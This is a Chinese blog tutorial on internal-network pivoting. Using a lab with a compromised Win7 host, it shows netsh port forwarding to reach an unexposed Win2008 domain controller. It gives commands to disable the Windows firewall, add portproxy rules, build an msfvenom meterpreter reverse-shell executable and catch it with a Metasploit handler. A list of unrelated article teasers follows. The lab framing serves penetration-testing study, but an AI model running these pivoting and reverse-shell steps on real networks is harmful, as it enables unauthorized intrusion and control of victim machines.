内网渗透隧道技术一netsh

news2024/11/18 9:22:02

隧道技术

百度百科:

网络隧道技术指的是利用一种网络协议来传输另一种网络协议,它主要利用网络隧道协议来实现这种功能。网络隧道技术涉及了三种网络协议,即网络隧道协议、隧道协议下面的承载协议和隧道协议所承载的被承载协议

在网络安全中隧道技术可以用于规避防火墙以及流量,加密网络流量以及内网穿透

端口映射

端口映射就是将内网主机的端口映射到公网的vps上,当访问公网IP的某个端口时会自动转发到内网的主机上面,和frp内网穿透比较相似

端口映射和端口转发

端口映射是将外网的一个端口完全映射内网的一个地址的指定端口,端口转发是将外网的一个端口的通信完全转发给内网一个地址的指定端口,端口映射可以实现外网到内网,内网到外网的双向通信,而转发只能实现外网到内网的单向通信

netsh端口转发

netsh是windows系统自带的一个命令行工具,这个工具可以实现端口转发,开启防火墙的情况下不行,所以先关闭防火墙

使用场景

假设我们有一个kali攻击机,已经拿到一个win7系统(出网)的shell,但是win2008域控在内网不出网,我们需要访问win7的某个端口就会自动转发到win2008中,将win7充当代理服务器,进而来访问win2008,实现这种操作可以在win7系统中执行端口转发的操作,这样我们访问win7的某个端口就会自动转发到win2008上面,就会实现对不出网域控的访问

netsh interface portproxy add v4tov4 listenport=绑定的端口 connectaddress=被攻击者服务器ip connectport=被攻击者服务端口

netsh interface portproxy show all		#查看转发规则
#根据端口清除规则指定规则:
netsh interface portproxy delete v4tov4 listenport=7777

#清除所有规则:
netsh interface portproxy reset

实验场景:

  • win7(已拿到shell):192.168.229.128 192.168.52.143
  • win2008:192.168.52.138 开放端口80
  • kali:192.168.229.129

关闭代理机的防火墙

netsh firewall set opmode mode = disable

在这里插入图片描述

在靶机的shell中执行添加规则

在这里插入图片描述

上面的命令会将win7系统的5555端口自动转发到win2008的80端口上面,此时kali访问192.168.229.128:5555就相当于访问192.168.52.138:80

在这里插入图片描述

netsh 配合msf反弹shell

msf 生成windows 反弹shell,反弹到代理机的8086端口上面

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.143 lport=8086 -f exe >8086.exe

代理机设置端口转发,将自身的8086端口映射到kali上的4444端口上

netsh interface portproxy add v4tov4 listenport=8086 connectaddress=192.168.229.129 connectport=4444

kali使用msf监听反弹shell

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp   #设置payload类型,就是和生成的一样
#设置主机地址
set lhost 192.168.229.128
#设置端口号
set lport 4444
#开启监听
run

在win2008中执行木马,kali msf上线

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1270250.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

通往数百万量子比特的商业化之路——

在已知物理定律的限制下,我们能制造出的最好的计算机是什么?争夺这一头衔的是通用、容错和可扩展的量子计算机。 这台建立在量子理论基础上的机器能够运行任何量子算法,检测并纠正任何可能危及计算的错误,并容纳大量量子比特。 当…

开发电脑软件学什么语言?哪些语言最适合?

随着信息技术的不断发展,电脑软件已经成为人们日常生活和工作中不可或缺的一部分,许多人都希望学习如何开发电脑软件,而选择一种合适的编程语言是成功的关键,下面将介绍几种最适合开发电脑软件的编程语言,以及一些基础…

自动提交日志脚本(2)状态机管理

使用状态机作为管理 """ filename:statusHandle.py author:LinXingNan time:2023-11-27 """ import os from enum import Enumimport configHandle import emailReport import logHandle import timeHandle import logging from datetime impo…

flask中路由route根据字典ID展示部分内容,字典名展示全部内容

from flask import Flask, jsonify , request,render_template,app Flask(__name__)app.config[JSON_AS_ASCII] Falsebooks [{"id": 1, "name": 三国演义},{"id": 2, "name": 水浒传},{"id": 3, "name": 西游记…

【UE】热成像效果

效果 步骤 1. 新建一个空白项目,勾选“光线追踪”选项 2. 添加一个第一人称游戏内容包到项目 3. 打开第一人称角色蓝图“BP_FirstPersonCharacter”,添加一个后期处理组件 在事件图表中设置通过按键N来切换不同的后期处理效果 将后期处理设置引脚提升为…

后端Long型数据传到前端js后精度丢失的问题

假设一个场景,MybatisPlus的雪花算法生成long类型主键ID,存入数据库,前端获取到数据后,要执行一个更新操作(updateById),但这时会出现无法成功更新的情况!这是因为前端在长度大于17位…

TCP/IP封装

数据如何通过网络发送?为什么 OSI 模型需要这么多层? 下图显示了数据在网络传输时如何封装和解封装。 步骤1:当设备A通过HTTP协议通过网络向设备B发送数据时,首先在应用层添加HTTP头。 步骤2:然后将TCP或UDP标头添加…

Python数据清洗--运用3δ准则检测异常值

1.3δ准则检测异常值的基本原理 当数据为连续型变量、服从或近似服从正态分布时,可运用3δ准则检测异常值。在该准则条件下,数据值与均值的偏差如果超过标准差的3倍,那么该数据值就会被视为异常值。即针对样本xi,如果满足&#x…

【Linux--进程】

目录 一、基本概念1.1描述进程-PCB1.2task_struct中内容分类 二、了解进程2.1查看进程2.2通过系统调用获取进程标识符 三、fork创建进程3.1fork()函数3.2写时拷贝 四、进程的状态4.1操作系统学科里的进程状态(运行、阻塞、挂起)4.具体的Linux状态是如何维…

MySQL之undo日志

聊聊undo log 什么是undo log undo log(回滚事务),在事务没有提交前,MySQL将记录更新操作的反向操作到undo log日志中,以便进行回退保证事务的原子性 undo log的作用 1.提供回滚操作 我们在进行数据更新操作的时候…

【Android Jetpack】Lifecycle 感知生命周期

文章目录 背景示例LifeCycle的原理LifecycleOwner自定义LifecycleOwnerLifecycleObserver 示例改进使用LifecycleService解耦Service与组件整个应用进程的生命周期ProcessLifecycleOwner 背景 在Android应用程序开发中,解耦很大程度上表现为系统组件的生命周期与普…

C++学习之路(十三)C++ 用Qt5实现一个工具箱(增加一个Base64加解密功能)- 示例代码拆分讲解

上篇文章,我们用 Qt5 实现了在小工具箱中添加了《XML文本格式化功能》功能。为了继续丰富我们的工具箱,今天我们就再增加一个平时经常用到的功能吧,就是「 Base64加解密 」功能。下面我们就来看看如何来规划开发一个这样的小功能并且添加到我…

改造http.server为简单的文件下载服务

改造 修改http.server.SimpleHTTPRequestHandler,实现简单的文件上传下载服务 simple_http_file_server.py: # !/usr/bin/env python3import datetime import email import html import http.server import io import mimetypes import os import posi…

hql面试题之字符串使用split分割,并选择其中的一部分字段的问题

版本:20231109 1.题目: 有两张表,a表有id和abstringr两个字段,b表也有id和bstr两个字段,具体如下 A表: 1abc,bcd,cdf2123,456,789 B表: 1acddef2123456 在a表的abstring字段中用‘,’分割,并取出前两…

万宾科技水环境综合治理监测系统的融合与应用

随着社会经济的快速发展,我国的水环境污染问题日益凸显,这不仅对生态环境造成了严重破坏,也严重威胁到人民群众的健康和生活质量。为了解决这一问题,城市生命线与水环境综合治理监测系统应运而生,二者的结合将为水环境…

TA-Lib学习研究笔记——Overlap Studies(二)下

TA-Lib学习研究笔记——Overlap Studies(二)下 (11)SAR - Parabolic SAR 抛物线指标 函数名:SAR 名称: 抛物线指标 简介:抛物线转向也称停损点转向,是利用抛物线方式,随…

在Springboot中将数据渲染到前端页面1.0

前端数据代码&#xff1a; <?xml version"1.0" encoding"UTF-8" ?> <emps><emp><name>金毛狮王</name><age>55</age><image>https://web-framework.oss-cn-hangzhou.aliyuncs.com/web/1.jpg</image…

《异常检测——从经典算法到深度学习》24 用于单变量时间序列异常检测的端到端基准套件

《异常检测——从经典算法到深度学习》 0 概论1 基于隔离森林的异常检测算法 2 基于LOF的异常检测算法3 基于One-Class SVM的异常检测算法4 基于高斯概率密度异常检测算法5 Opprentice——异常检测经典算法最终篇6 基于重构概率的 VAE 异常检测7 基于条件VAE异常检测8 Donut: …

Flutter加固原理及加密处理

​ 引言 为了保护Flutter应用免受潜在的漏洞和攻击威胁&#xff0c;加固是必不可少的措施之一。Flutter加固原理主要包括代码混淆、数据加密、安全存储、反调试与反分析、动态加载和安全通信等多个方面。通过综合运用这些措施&#xff0c;可以提高Flutter应用的安全性&#xf…

android开发:用IDEA建立你的第一个APP

主要是记录一下各种小坑。 IDEA目前是第一流行的java开发工具&#xff0c;同时也支持android开发&#xff0c;可以替代安卓官方的andriod studio&#xff0c;不过仍然要依赖android sdk。 本例指导你完成第一个app&#xff0c;需要一台Windows PC和一部android手机。 目录 一…